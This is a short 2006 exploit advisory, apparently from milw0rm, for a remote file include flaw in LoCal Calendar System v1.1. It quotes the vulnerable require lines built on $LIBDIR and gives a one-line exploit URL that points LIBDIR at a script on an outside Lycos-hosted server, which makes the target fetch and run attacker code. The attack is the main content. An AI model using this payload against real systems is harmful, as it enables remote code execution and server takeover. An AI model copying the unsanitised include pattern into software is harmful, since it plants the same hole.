local Calendar System v1.1 (lcUser.php) Remote File Include

2006-10-23T00:00:00
ID SECURITYVULNS:DOC:14797
Type securityvulns
Reporter Securityvulns
Modified 2006-10-23T00:00:00

Description

+------------------------------------------------------------------------------------------- local Calendar System v1.1 (lcUser.php) Remote File Include


An advanced instrumentation reservation system for equipment calendaring and user management.

download : ftp://ftp.loci.wisc.edu/locisoftware/LoCal/LoCal-1.1.tar.gz

screenshot : http://www.loci.wisc.edu/calendar/tutorial/monthview.jpg

code : require "$LIBDIR/lcMembership.inc"; require "$LIBDIR/lcErrorChecker.inc";


exploit: local/lib/lcUser.php?LIBDIR=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?


greetz : :( no one


by o0xxdark0o i think... so that... i m here o0xxdark0o@msn.com

---------------------------------------------------------------------------------------------------

milw0rm.com [2006-10-18]